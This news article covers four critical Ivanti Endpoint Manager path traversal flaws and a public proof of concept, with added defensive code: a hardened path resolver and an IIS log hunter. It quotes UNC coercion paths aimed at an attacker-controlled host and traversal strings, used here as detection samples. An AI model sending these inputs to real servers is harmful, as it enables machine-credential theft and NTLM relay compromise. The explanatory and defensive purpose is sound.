Ivanti endpoint manager can become endpoint ravager, thanks to quartet of critical flaws

PoC exploit code shows why this is a patch priority


Security engineers have released a proof-of-concept exploit for four critical Ivanti Endpoint Manager bugs, giving those who haven't already installed patches released in January extra incentive to revisit their to-do lists.

The four vulnerabilities, each rated 9.8 out of 10 on the CVSS severity scale, are tracked as CVE-2024-10811, CVE-2024-13161, CVE-2024-13160, and CVE-2024-13159.

Ivanti described all four as absolute path traversal flaws and fixed them for its Windows-based product in its January update.

At the time, the vendor didn't provide much detail about the critical security holes other than to note that a successful exploit would allow "a remote unauthenticated attacker to leak sensitive information."

A lot more info about the bugs is now available thanks to the appearance of a technical write-up by Zach Hanley, a vulnerability researcher at infosec consultancy Horizon3.ai. Hanley found and reported the flaws to Ivanti in October 2024, and on Wednesday published a proof-of-concept (PoC) exploit.

According to Hanley, all four flaws can be exploited by an unauthenticated attacker and can be abused "to coerce the Ivanti [Endpoint Manager] machine account credential to be used in relay attacks, potentially allowing for server compromise."

In slightly plainer English: anyone who can reach the web-based APIs of a vulnerable Ivanti Endpoint Manager deployment can hand the software a path that points at a server they control. When the manager tries to look up that directory, Windows authenticates to the remote host using the manager's machine account, and the attacker captures the resulting NTLMv2 challenge-response (the "Net-NTLMv2 hash"). That value is not a reusable password hash and, for a machine account with its long random password, is impractical to crack, but it can be relayed to other services on the network that accept the machine account, the classic targets being hosts that do not require SMB signing, and that is the path to account impersonation and wider system compromise.

It's as easy as passing a UNC path such as \\\\10.0.0.1\\tmp\\thing[.]txt as a parameter to the affected parts of the API: the manager then attempts to authenticate to 10.0.0.1 to access that path, and in doing so leaks the machine account's NTLMv2 response to that remote box. No credentials are needed to make the API calls in the first place, which is what earns these bugs their critical rating.
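The bug class in code, as an added illustration that is not Ivanti's code or Horizon3's PoC: a hypothetical API handler that joins a caller-supplied path onto a base directory (the base directory, the handler and the `check` wrapper are all assumptions for the example). `ntpath` is used so the Windows path semantics are reproduced on any platform; the vulnerable form shows why a UNC, drive-letter or device path discards the base directory entirely, and the hardened form rejects those along with traversal.

```python
"""Absolute path traversal: why a UNC path in an API parameter reaches a remote host.

Added illustration, not Ivanti's code. Assumes a hypothetical API handler that
joins a caller-supplied path onto a base directory before opening it. ntpath is
used so the Windows semantics are reproduced on any platform.
"""
import ntpath

# Hypothetical base directory the API is supposed to stay inside (assumption).
BASE_DIR = r"C:\EPM\lookup"


class UnsafePath(ValueError):
    """Raised when a caller-supplied path is rejected."""


def vulnerable_resolve(base_dir, user_path):
    """The bug class in one line: ntpath.join drops base_dir entirely when
    user_path carries its own drive or UNC root, so '\\\\10.0.0.1\\tmp\\x' is
    opened as-is and Windows authenticates to 10.0.0.1 with the machine account."""
    return ntpath.join(base_dir, user_path)


def safe_resolve(base_dir, user_path):
    """Hardened form: reject anything absolute, rooted, UNC/device style or that
    climbs above base_dir, then verify the final path is still under base_dir."""
    if not user_path or "\x00" in user_path:
        raise UnsafePath("empty path or embedded NUL")
    # splitdrive() returns a non-empty drive for 'C:...', '\\\\server\\share\\...',
    # '//server/share/...' and '\\\\?\\...' device paths; all of these leave base_dir.
    drive, _ = ntpath.splitdrive(user_path)
    if drive or ntpath.isabs(user_path) or user_path[0] in "\\/":
        raise UnsafePath("absolute, rooted or UNC path rejected")
    # Collapse '.' and '..' segments; anything that still starts with '..'
    # would escape base_dir.
    normalized = ntpath.normpath(user_path)
    if normalized == ".." or normalized.startswith("..\\"):
        raise UnsafePath("path traversal rejected")
    base = ntpath.normpath(base_dir)
    full = ntpath.normpath(ntpath.join(base, normalized))
    # Belt and braces: the resolved path must have base_dir as its prefix
    # (case-insensitive, as NTFS is).
    if ntpath.commonpath([base, full]).lower() != base.lower():
        raise UnsafePath("resolved path escapes base directory")
    return full


def check(user_path, base_dir=BASE_DIR):
    """Convenience wrapper: (True, resolved path) or (False, reason)."""
    try:
        return True, safe_resolve(base_dir, user_path)
    except UnsafePath as exc:
        return False, str(exc)


if __name__ == "__main__":
    # Constructed inputs: the coercion payload from the article, its forward-slash
    # and \\?\UNC variants, a drive-letter path, two traversals and two legitimate
    # relative paths.
    for p in (r"\\10.0.0.1\tmp\thing.txt", "//10.0.0.1/tmp/thing.txt",
              r"\\?\UNC\10.0.0.1\tmp\thing.txt", r"C:\Windows\win.ini",
              r"..\..\Windows\win.ini", r"sub\..\..\x",
              r"reports\q1.txt", "reports/../q1.txt"):
        print(f"{p!r:40} vulnerable -> {vulnerable_resolve(BASE_DIR, p)!r:42} "
              f"hardened -> {check(p)}")
```

Two details worth noting: forward slashes are a valid separator on Windows, so `//host/share` is just as much a UNC path as `\\host\share`, and `ntpath.isabs` stopped treating a single leading backslash as absolute in Python 3.13, which is why the leading-separator check is explicit rather than relying on `isabs` alone.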

Ivanti told us it has found "no evidence" the flaws have been targeted, reminded us that patches are available, and urged their adoption now that PoC code is public, as "new information in the public domain increases the risk of potential exploitation."

That's sound advice: attackers have a track record of poking holes in Ivanti products, as was the case when the vendor addressed zero-day exploits last month.
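"No evidence" is only as good as the logs someone has looked at. The following is an added example, not Ivanti's tooling or anything from the advisory, of how a defender could sweep IIS W3C logs for parameter values that would coerce the server onto a remote host: UNC paths in either separator style, `\\?\UNC\` device-path variants, drive-letter paths and double-encoded traversal. The log lines, the `/api/v1/lookup` endpoint and the `path` parameter are constructed placeholders; the real column list comes from the `#Fields:` header of your own log files.

```python
"""Hunting for UNC/absolute-path coercion attempts in IIS W3C logs.

Added example, not Ivanti's tooling. The log lines below are constructed and
the /api/v1/lookup endpoint and 'path' parameter are hypothetical placeholders.
"""
import re
from urllib.parse import parse_qsl, unquote

# Constructed sample in IIS W3C extended format (not real Ivanti logs).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2025-03-06 10:00:01 10.1.2.3 GET /api/v1/lookup path=reports%5Cq1.txt 200
2025-03-06 10:00:05 203.0.113.9 GET /api/v1/lookup path=%5C%5C203.0.113.9%5Ctmp%5Cthing.txt 200
2025-03-06 10:00:07 203.0.113.9 GET /api/v1/lookup path=//203.0.113.9/tmp/thing.txt 200
2025-03-06 10:00:09 10.1.2.4 GET /api/v1/lookup path=C%3A%5CWindows%5Cwin.ini 200
2025-03-06 10:00:11 10.1.2.5 GET /api/v1/lookup path=%252E%252E%255C%252E%252E%255CWindows%255Cwin.ini 200
2025-03-06 10:00:13 10.1.2.6 GET /api/v1/status - 200
"""


def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding; attackers double-encode to dodge naive filters."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(value):
    """Return (kind, coerced_host_or_None) for a path-like parameter value."""
    v = value.replace("/", "\\")  # Windows accepts either separator
    if v.startswith("\\\\"):
        # \\server\share, \\?\UNC\server\share, \\?\C:\ and \\.\device all start this way
        parts = [p for p in v.split("\\") if p]
        if parts[:2] == ["?", "UNC"]:
            host = parts[2] if len(parts) > 2 else None
        elif parts and parts[0] in ("?", "."):
            host = None  # local device/verbatim path, no remote host involved
        else:
            host = parts[0] if parts else None
        return "unc", host
    if re.match(r"^[A-Za-z]:", v):
        return "absolute", None
    if v.startswith("\\"):
        return "rooted", None
    if re.search(r"(^|\\)\.\.(\\|$)", v):
        return "traversal", None
    return None, None


def parse_w3c(text):
    """Yield one dict per data line, naming columns from the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        cols = line.split(" ")  # IIS encodes spaces inside fields, so a plain split is safe
        if len(cols) == len(fields):
            yield dict(zip(fields, cols))


def hunt(text):
    """Return a finding for every query parameter whose value would leave the
    intended directory on a Windows host."""
    findings = []
    for record_no, rec in enumerate(parse_w3c(text), 1):
        query = rec.get("cs-uri-query", "-")
        if query == "-":
            continue
        for name, raw in parse_qsl(query, keep_blank_values=True):
            value = decode_fully(raw)
            kind, target = classify(value)
            if kind:
                findings.append({"record": record_no, "c_ip": rec["c-ip"],
                                 "uri": rec["cs-uri-stem"], "param": name,
                                 "value": value, "kind": kind, "target": target})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"record {f['record']}: {f['kind']:9} from {f['c_ip']:13} "
              f"{f['uri']}?{f['param']}={f['value']!r} target={f['target']}")
```

Two caveats for anyone running something like this for real: W3C logs record query strings only, so parameters sent in a request body need WAF or request-capture logging instead, and the `target` host is the one the server would have authenticated to, which is the value to correlate against outbound SMB (445/TCP) connections from the Endpoint Manager core server to anything outside its expected set of domain controllers and file servers.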

Ponder patch 2.0, too

Whether or not you applied the January patch, Ivanti urges all users to install a second version of its fix: the first one broke the Windows "Actions" tab, preventing users from creating new Windows Action packages or editing existing ones.

"We have updated this patch to a V2 version that restores the 'Actions' tab," a February 18 update to Ivanti's security advisory noted. "If the original version was installed, V2 needs to be installed as well to restore the 'Actions' tab."
